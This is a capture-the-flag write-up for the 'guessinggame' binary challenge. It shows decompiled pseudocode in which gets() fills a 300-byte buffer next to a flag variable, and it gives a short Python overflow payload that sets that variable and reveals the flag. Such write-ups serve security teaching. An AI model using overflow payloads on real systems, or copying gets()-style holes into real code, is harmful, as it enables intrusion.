Rating: 4.7

# guessinggame

No one seems to be able to guess my favorite animal... Can you?

nc chal.pctf.competitivecyber.club 9999

## Solution

I brought it to IDA and here are the pseudocode generated from there that I looked at.
**main()**

c
int __cdecl main(int argc, const char **argv, const char **envp)
{
puts("Hello there, friend! Can you guess my favorite animal?");
check("Hello there, friend! Can you guess my favorite animal?", argv);
return 0;
}


**check()**

c
int check()
{
int result; // eax
char s2[8]; // [rsp+8h] [rbp-138h] BYREF
char s1[300]; // [rsp+10h] [rbp-130h] BYREF
int v3; // [rsp+13Ch] [rbp-4h]

strcpy(s2, "Giraffe");
v3 = 0;
printf("Input guess: ");
gets(s1);
if ( !strcmp(s1, s2) )
result = puts("That's not my favorite animal... I promise!");
else
result = puts("ERRR! Wrong!");
if ( v3 )
{
puts("I wasn't able to trick you...");
return outputFlag();
}
return result;
}


Analyzing this function, we can see that v3 needs to be set to 1 for us to get the flag. But of course, there is no way for us to directly do that. But as we can see, the input is actually saved into s1 with the buffer size of 300 and right after that is where v3 is. So essentially, we can send a payload that has 300 bytes of data with \x01 added to it.
python
payload = f"{'A' * 0x12C}\x01"


If we send this payload, it overflows s1 and sets v3 to 1 which outputs that flag:


PCTF{1_l0v3_g1raff35_85036769}